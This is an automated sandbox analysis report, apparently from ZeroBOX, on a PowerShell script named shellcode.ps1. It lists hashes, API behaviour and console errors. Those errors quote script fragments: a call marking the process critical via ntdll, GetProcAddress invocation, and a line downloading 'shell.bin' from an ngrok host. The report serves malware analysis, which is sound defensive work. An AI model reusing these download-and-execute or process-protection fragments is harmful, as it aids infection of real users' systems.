Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 23, 2024, 9:22 a.m.	Aug. 23, 2024, 9:28 a.m.

Size	19.9KB
Type	ASCII text, with CRLF line terminators
MD5	`5dd40b8cbfb8f613cdce8b7dae0de85b`
SHA256	`324b95bbe85d2e82b6a0b25f4507652aaed24d552ce353572bce5043550a9fe6`
CRC32	`2569F42B`
ssdeep	`384:EvNuk5H/vSB6DDsdc9ks1I3PFfkyJMgmUjjafaukBg1TM3n89wPFJz:quk50G4dg1Q8pi+Cud1TM3mwP3`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\shellcode.ps1
2556

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 130 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: Cannot convert argument "3", with value: "Winapi", for "DefinePInvokeMethod" to console_handle: 0x0000001b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: type "System.Reflection.CallingConventions": "Cannot convert value "Winapi" to console_handle: 0x00000027	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: type "System.Reflection.CallingConventions". Error: "Invalid cast from 'System console_handle: 0x00000033	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: .Runtime.InteropServices.CallingConvention' to 'System.Reflection.CallingConven console_handle: 0x0000003f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: tions'."" console_handle: 0x0000004b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:11 char:54 console_handle: 0x00000057	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $methodBuilder = $typeBuilder.DefinePInvokeMethod <<<< ('RtlSetProcessIsC console_handle: 0x00000063	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: ritical', 'ntdll.dll', console_handle: 0x0000006f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodException console_handle: 0x0000007b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument console_handle: 0x00000087	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:20 char:27 console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $methodInfo.Invoke <<<< ($null, @($isCritical, $unknown1, $unknown2)) console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: eption console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000103	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000010f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000011b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:79 char:39 console_handle: 0x00000127	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $kematianthegreat = (Invoke-WebRequest <<<< -UseBasicParsing "https://ratte. console_handle: 0x00000133	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: ngrok.app/main/shell.bin").Content console_handle: 0x0000013f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000014b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: ommandNotFoundException console_handle: 0x00000157	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000163	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: Unable to index into an object of type System.Reflection.RuntimeMethodInfo. console_handle: 0x00000183	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:47 char:41 console_handle: 0x0000018f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $result = $getProcAddressMethod[ <<<< 0].Invoke($null, @($handle, $ke console_handle: 0x0000019b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: matian_func)) console_handle: 0x000001a7	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException console_handle: 0x000001b3	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + FullyQualifiedErrorId : CannotIndex console_handle: 0x000001bf	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: Method invocation failed because [System.Runtime.InteropServices.HandleRef] doe console_handle: 0x000001df	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: sn't contain a method named 'new'. console_handle: 0x000001eb	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:51 char:69 console_handle: 0x000001f7	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $handleRef = [System.Runtime.InteropServices.HandleRef]::new <<<< ($n console_handle: 0x00000203	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: ull, $handle) console_handle: 0x0000020f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept console_handle: 0x0000021b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: ion console_handle: 0x00000227	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x00000233	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: Unable to index into an object of type System.Reflection.RuntimeMethodInfo. console_handle: 0x00000253	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:52 char:41 console_handle: 0x0000025f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $result = $getProcAddressMethod[ <<<< 0].Invoke($null, @($handleRef, console_handle: 0x0000026b	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: $kematian_func)) console_handle: 0x00000277	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException console_handle: 0x00000283	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + FullyQualifiedErrorId : CannotIndex console_handle: 0x0000028f	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: Unable to index into an object of type System.Reflection.RuntimeMethodInfo. console_handle: 0x000002af	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcode.ps1:47 char:41 console_handle: 0x000002bb	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + $result = $getProcAddressMethod[ <<<< 0].Invoke($null, @($handle, $ke console_handle: 0x000002c7	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: matian_func)) console_handle: 0x000002d3	1	1
WriteConsoleW Aug. 23, 2024, 9:22 a.m.	buffer: + CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException console_handle: 0x000002df	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 23, 2024, 9:22 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e2528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 23, 2024, 9:22 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (39 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02739000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06191000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06192000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0662a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0663b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0663c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0663d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06193000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06194000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06195000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06196000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06197000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x061f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06198000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06199000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0663e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0663f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0619a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0619b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0619c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0619d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0619e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0619f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 23, 2024, 9:22 a.m.	process_identifier: 2556 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06641000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 23, 2024, 9:22 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 23, 2024, 9:22 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

shellcode.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All